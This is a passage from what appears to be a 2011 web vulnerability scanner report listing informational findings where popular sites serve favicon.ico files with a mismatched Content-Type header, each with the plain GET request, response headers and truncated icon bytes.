HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:06 GMT
Server: Apache
Static-Dir-Bind: favicon.ico, /mezi/sites/smarter.com/code/web/, /
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:32:06 GMT
ETag: "f7215d6dbffe11f8f95ff64b3024678c"
Loader-Time-Used: 0.00091
Vary: Accept-Encoding,User-Agent
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ...................................I...@\V.NWS.,20.6=:.-20.D...B...9ja.M...D...BJG.LUQ.F...G...B...L...<OJ.?|q.@HE.@...G...H...$3/.G.y.>FC.N...Bjb.*PI.J....ID.E...L...<D
...[SNIP]...

27.183. http://www.smugmug.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smugmug.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smugmug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 23 Apr 2010 05:27:32 GMT
ETag: "13e-484e0af187900"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:37:20 GMT
Connection: close

..............(.......(....... ...............H...H...................DBD.....$"$.....dbd.............TRT.....424.....trt..w..wwwwwwwwww.{w.{w{w...ww{wy
].g.w{0.{}.w{w.ww{..ww.www.gw..w{wq..w0a....w{q
...[SNIP]...

27.184. http://www.songlyrics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.songlyrics.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.songlyrics.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:39:05 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 4286
Cache-Control: max-age=21600, public
Connection: close
Content-Type: text/plain; charset=UTF-8

...... .... .........(... ...@..... .........i...i...........cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.cUO.aS
...[SNIP]...

27.185. http://www.sony.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sony.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sony.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "16c320-37e-9232ec80"
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:50:43 GMT
Last-Modified: Thu, 20 Apr 2006 18:02:10 GMT
Content-Length: 894
Connection: keep-alive

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

27.186. http://www.space.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.space.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.space.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:36 GMT
Last-Modified: Wed, 12 Jan 2011 18:34:49 GMT
ETag: "1ecab-e36-499aa74bee440"
Accept-Ranges: bytes
Content-Length: 3638
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TSf4ec54=d0677b7b7d61b86ff3a6c5f1eca230d7971b76fb1a1987004d972dd8; Path=/

..............h...&... ..............(....... ...........@...................................>>>.^^^.....................MMM.qqq.........333.(((.........hhh.UUU.........EEE.yyy.....................##
...[SNIP]...

27.187. http://www.spanishdict.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.spanishdict.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.spanishdict.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
ETag: "47e-4716b1c97ea80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=2792000
Expires: Wed, 04 May 2011 13:41:49 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@....................l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..i$..i$..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l)..l
...[SNIP]...

27.188. http://www.squidoo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.squidoo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.squidoo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 30 Jul 2009 20:00:41 GMT
ETag: "6b81abb-37e-46ff1c2180c40"
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Date: Sat, 02 Apr 2011 12:43:59 GMT
X-Varnish: 1788366282 1788098071
Age: 3683
Via: 1.1 varnish
Connection: keep-alive

..............h.......(....... ...............#...#.......................................................................................................................]h.y~.uVTUb:]................
...[SNIP]...

27.189. http://www.staples.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.staples.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.staples.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server
Content-Length: 14
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:25:20 GMT
Connection: close
Set-Cookie: zipcode=20001; expires=Fri, 28-Mar-2031 13:25:20 GMT; path=/
ZipCodeDebug: Cookie=absent_BestGuess=present

File not found

27.190. http://www.suite101.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.suite101.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.suite101.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:42 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Last-Modified: Fri, 25 Jun 2010 21:13:03 GMT
ETag: "1f79678-47e-489e13c8775c0"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8
Set-Cookie: Coyote-2-455a6255=455a6259:0; expires=Sat, 02-Apr-11 13:01:38 GMT; path=/

............ .h.......(....... ..... .........................................?...........9..C........*..{....+...............................V..'........O..d....U...(...    ...a.........................
...[SNIP]...

27.191. http://www.supercheats.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.supercheats.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.supercheats.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:57 GMT
Server: Apache
Last-Modified: Tue, 08 Jun 2010 11:41:12 GMT
ETag: "488834421c600"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... .........................................................................................


.........................................................


.$$$.rrr...
...[SNIP]...

27.192. http://www.tagged.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tagged.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:06 GMT
Server: Apache
Last-Modified: Fri, 11 Jun 2010 16:40:44 GMT
ETag: "7f2bb0-57e-488c3ccdedb00"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .......................................PPP.ddd.........ppp.NNN.........ooo.@@@.........................000...............................................................
...[SNIP]...

27.193. http://www.takkle.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.takkle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.takkle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:08 GMT
Server: Apache/2.2.3 (Oracle)
Accept-Ranges: bytes
ETag: W/"1406-1294350392000"
Last-Modified: Thu, 06 Jan 2011 21:46:32 GMT
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ............................................#+..+4..........7C...................
..{...............JZ......Tf..^r......<I......-6..........................q...=K.......
...[SNIP]...

27.194. http://www.talkingpointsmemo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.talkingpointsmemo.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.talkingpointsmemo.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 02 Sep 2009 13:26:20 GMT
ETag: "7a4d55-47e-4729836649700"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.............................................................................................................................................................
...[SNIP]...

27.195. http://www.techsupportforum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.techsupportforum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.techsupportforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:15 GMT
Server: Apache
Last-Modified: Sun, 30 Jan 2011 20:13:55 GMT
ETag: "294000b-140-49b15f04c66c0"
Accept-Ranges: bytes
Content-Length: 320
Content-Type: text/plain; charset=UTF-8

GIF89a...................~.}g.@c.8`.7b.8lydh.:i.=d./f.3e.4q.Pt.jsjnyfovju|pe..e./f./e.1c.0j.5l.8k.8n.<p.>r.Bp.Hv.Mz.Sv.Sp.Oz.Xs.Yx.^p.Ym.\Wt:~.{.....m.E.a}.ayws..................GGG................
...[SNIP]...

27.196. http://www.thedailybeast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thedailybeast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thedailybeast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 22:58:05 GMT
ETag: "dc48eb-37e-7a435940"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:40:10 GMT
Connection: close

..............h.......(....... ..................................++."!....##.((..!..........(%.(%......................VV..........yy....nr........-.tr.vu...................64.GG...............TT.rs.
...[SNIP]...

27.197. http://www.thefrisky.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.thefrisky.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thefrisky.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 12 Nov 2008 05:00:00 GMT
ETag: "1ad322-37e-45b76de425400"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Cache-Control: max-age=70094
Date: Sat, 02 Apr 2011 13:33:13 GMT
Connection: close
Vary: Accept-Encoding

..............h.......(....... ................................&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.)D.(C.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&B.&BMgzp...&B.&B
...[SNIP]...

27.198. http://www.tinypic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tinypic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tinypic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:37:27 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Tue, 29 Jan 2008 14:46:30 GMT
ETag: "57e-7d731d80"
Accept-Ranges: bytes
Content-Length: 1406
Age: 2
X-Cache: HIT from tinypic.com
Via: 1.0 den2tpsq02:80 (squid)

..............h.......(....... ................................C...F...I...`1..h2..u<..vU..xU..{U..|U..~U...\...d...`...L...b...N...O...Q...k...m...t...U...o...q...s...u...\...\...{...{...]...}...~...
...[SNIP]...

27.199. http://www.tomshardware.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tomshardware.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tomshardware.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sun, 27 Mar 2011 00:18:07 GMT
Server: Apache
Last-Modified: Thu, 06 Sep 2007 15:38:14 GMT
ETag: "4ae3ab-57e-439794f790580"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding
Content-Type: text/plain
Age: 22420
X-Cache: HIT from proxy-us1.bsocom.net
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
Connection: keep-alive

..............h.......(....... ...........................................hhh.................**..666.....,++.888.............OOO..
.pop.............{{{.........................IID.........aa`.baa.~~
...[SNIP]...

27.200. http://www.toptenreviews.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.toptenreviews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toptenreviews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:37 GMT
Server: Apache
Last-Modified: Wed, 16 Jan 2008 17:05:31 GMT
ETag: "6a4057-13e-443d9eaacccc0"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

..............(.......(....... ...................................{....{..{{....{.{.{..{{.....{{{.............................DDDDDDDDHwwwwww.@..pxE..@tDuDDDT@tHtEDTD@tGTG.tD@tGDH..D@tGDG.tDH.GDw.wDDD
...[SNIP]...

27.201. http://www.trulia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trulia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trulia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (EL)
Last-Modified: Wed, 30 Mar 2011 23:00:46 GMT
ETag: "16f31f5-47e-49fbb25a34380"
Cteonnt-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:35:54 GMT
Content-Length: 1150
Connection: close
Cache-Control: private

............ .h.......(....... ..... .............................C.Y.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.&.@.C.Y.....F.].).E.).E.).E.).E.).E.E.].........).E.).E.).E.).E.).E.).E.F.].+.I.+.I.+.
...[SNIP]...

27.202. http://www.twitlonger.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.twitlonger.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.twitlonger.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Sep 2010 17:25:34 GMT
ETag: "16d021d-47e-48fc2cd155f80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@...................776.765.765.765.765.765.765.765.;<@.<>C.<>C.<>C.<>C.<>C.<>C.<>C...................................R..l(..o...o...o...o...o...o............
...[SNIP]...

27.203. http://www.umn.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.umn.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.umn.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:52 GMT
Server: Apache/1.3.41 (Unix) mod_jk/1.2.15 mod_fastcgi/2.2.12 mod_ssl/2.8.31 OpenSSL/0.9.8g
Last-Modified: Wed, 01 Oct 2008 16:41:24 GMT
ETag: "1adf-538-48e3a834"
Accept-Ranges: bytes
Content-Length: 1336
Content-Type: text/plain

BM8.......6...(.......................................ik..1...C<..VXv.....................4#..........+
..9+..}...72..MI..>3..RQ..ru..............lih.............UT..v.......ce........................
...[SNIP]...

27.204. http://www.ups.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ups.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ups.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:14 GMT
Server: Apache
Last-Modified: Thu, 09 Jul 2009 19:15:08 GMT
Accept-Ranges: bytes
Content-Length: 2238
Vary: User-Agent
Content-Type: text/plain

...... ..............(... ...@.......................................B...B...B...9...B...B...........9...B...J...B...J.......B...........R...c.......Bq..1q..)i..cy..Bq..{...9...k...ky...0c.1i..1y....
...[SNIP]...

27.205. http://www.urbandictionary.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.urbandictionary.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.urbandictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:18 GMT
Server: VoxCAST
Last-Modified: Thu, 13 Jan 2011 01:19:38 GMT
ETag: "2d8912-47e-499b01c7b9e80"
Accept-Ranges: bytes
Content-Length: 1150
Vary: Accept-Encoding
Age: 26381
X-Cache: HIT from VoxCAST
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@..................."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b.."b
...[SNIP]...

27.206. http://www.vast.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vast.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vast.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
ETag: "1ea9a7e-57e-49f03a2fc3ac0"
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa CONi TELi OUR BUS IND PHY ONL UNI COM NAV INT DEM STA"
Accept-Ranges: bytes
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:43:36 GMT
Last-Modified: Mon, 21 Mar 2011 20:04:35 GMT
Server: Apache
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................................j.......g...`................H..Y................'...........7..m
..........................{...........{...l.......n
...[SNIP]...

27.207. http://www.verisign.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.verisign.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

............ .h...&... .... .........(....... ..... ........................................
xP.dU...E...E...F...]*...b.:.............................{.#U...U....................Y..E...yQ............
...[SNIP]...

27.208. http://www.vitals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vitals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vitals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 25 Jan 2007 19:56:33 GMT
ETag: "47e-427e2ced4fe40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................    ~..|{......$#('....LLN.........................................A@?[........HHEl......................................
...[SNIP]...

27.209. http://www.weather.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.weather.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weather.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Age: 8
X-Cache-TTL: 892
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:02 GMT
Content-Length: 1406
Content-Type: text/plain; charset=iso-8859-1
Expires: Sat, 02 Apr 2011 13:47:02 GMT
Cache-Control: max-age=900
Proxy-Connection: close
Server: Apache
Last-Modified: Fri, 29 Jun 2007 19:26:18 GMT
Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7)
X-Cached-Time: Sat, 02 Apr 2011 13:31:05 GMT

..............h.......(....... ...........@....................................*...fN.......O......I/...r.......'...........k..........rc.......9..U?..7............Z...................u..!...0...^H...
...[SNIP]...

27.210. http://www.webgains.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webgains.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webgains.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:52 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 22 Sep 2009 08:50:37 GMT
ETag: "260e0a-37e-47426b12df140"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

27.211. http://www.webkinz.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.webkinz.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
